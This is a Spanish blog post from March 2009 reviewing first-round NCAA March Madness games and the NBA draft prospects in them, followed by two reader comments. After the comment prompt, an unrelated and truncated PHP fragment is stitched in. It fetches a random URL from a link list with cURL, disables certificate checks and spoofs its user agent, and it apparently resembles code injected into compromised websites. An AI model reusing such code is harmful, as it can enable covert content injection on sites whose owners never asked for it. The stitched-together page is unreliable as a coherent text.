La March Madness ya está aquí

20 de March de 2009 por txusma

Como cada año por estas fechas un acontecimiento deportivo eclipsa parcialmente a la todopoderosa NBA. Se trata de la Mach Madness de la NCCA (la liga de baloncesto universitaria), una competición de eliminatorias a un solo partido de la que saldrán los 4 equipos que disputarán, a principios de Abril, la Final Four.

Estudiando esta competición desde el prisma de la NBA, vamos a realizar durante los próximos días, un seguimiento de los jugadores que más suenan para el próximo draft.

En el número 1 de todos los mocks aparece Blake Griffin, ala-pívot de la Universidad de Oklahoma que ha promediado durante la temporada unos excelentes 21 puntos y 10.3 rebotes. Lo comparan con Carlos Boozer y el Antonio McDyess de antes de las lesiones y ayer volvió a demostrar su potencial liderando a su universidad en la victoria frente Morgan State con 28 puntos y 13 rebotes. En Oklahoma también juega el escolta Willie Warren, un killer de gran potencial, que suena para los puestos de loteria del draft y que ayer ayudó con 16 puntos.

Otro de los destacados que saltó ayer a la pista fue Hasheem Thabbet, el pívot de UConn. El tanzano de 2’21 es una auténtica bestia parda en defensa, casi impenetrable, gran intimidador y taponeador, lo que le otorga de momento el número 4 en las apuestas. Todavía ha de pulir su juego ofensivo, pero su potencial es innegable. Ayer, lideró a los Huskies en su victoria por 56 puntos de diferencia frente a Chattanooga, contribuyendo él con 20 puntos, 13 rebotes y 2 tapones.

Otro de los equipos que venció con relativa comodidad fue Duke gracias a un juego de equipo y una concentración magistrales, propias de su entrenador, Mike Krzyzewski y es que 6 jugadores anotaron más de 10 puntos. Entre ellos, los que suenan para la primera ronda del draft: Gerald Henderson, escolta que está entre los 8 primeros en las quinielas, y Kyle Singler, alero que suena para las últimas posiciones de la primera ronda.

North Carolina comenzó su participación en la March Madness sin su base titular, Ty Lawson, que aparece en las posiciones medias de la primera ronda de los mocks. Pero si Tyler Hansbrough y Wayne Ellington están en tu equipo tampoco hay mucho de lo que preocuparse. Phsico-T, que a pesar de sus increíbles actuaciones en la NCCA aparece por los pelos en la primera ronda del draft de este año, anotó 22 puntos y su compañero, número 2 en los mocks del 2010 por detrás de Ricky Rubio, lideró al equipo con 25 y 8 rebotes. Sin duda, los Taar Heels son uno de los grandes favoritos para llegar a la Final Four de Abril.

Memphis, que se quedó a las puertas del triunfo la temporada pasada, resolvió su partido con más problemas de los previstos, pero al contrario que se podía esperar no fue de la mano de Tyreke Evans, su máxima estrella, sino de un semidesconocido Roburt Sallie. Sallie, que promediaba hasta ayer 4.3 puntos por partido, anotó 10 triples de 15 intentos y se fue hasta los 35 puntos, evitando con ello lo que hubiera sido una de las mayores sorpresas del torneo: la derrota de Memphis en primera ronda.

En otros partidos destacados, Western Kentucy se cargó a Illinois en lo que supone la primera gran sorpresa del torneo con un final de partido magnífico y UCLA, que sin Kevin Love es menos UCLA, ganó por un solo punto a VA Commonwealth. En la última jugada se enfrentaron los 2 jugadores más destacados de ambos equipos: Eric Maynor por VA y Darren Collison por UCLA: Maynor, que lideró a su equipo con 21 puntos, falló el que hubiera podido ser el tiro de la victoria ante la buena defensa de Collison.

Comenta

2 comentarios a esta entrada

  1. Noname dice:
    #1

    Gracias por la info, no conozco mucho de la NCCA por no decir mas bien nada, jeje. Un pokillo de culturilla no viene mal, a ver si saco tiempo y me busco las mañas para ver algun partidillo a ver que nivel hay.
    salu2

      Citar

  2. Dantley dice:
    #2

    Thabeet no me llena, no sé, ahora mismo (se ve en la foto) la diferencia física es descomunal.

    Por cierto, vaya carita de Griffin, jeje.

    Se puede ver en directo y gratis en http://mmod.ncaa.com/

    No parece que haya muchos partidazos hoy, pero es buen día para ver a Harden (top-5 seguramente) en Arizona St., Clark y Williams en Louisville, uno de los favoritos, Jordan Hill (otro top-5) de Arizona o Jeff Teague de Wake Forest, que se peleará con Jennings ser el mejor base del draft.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>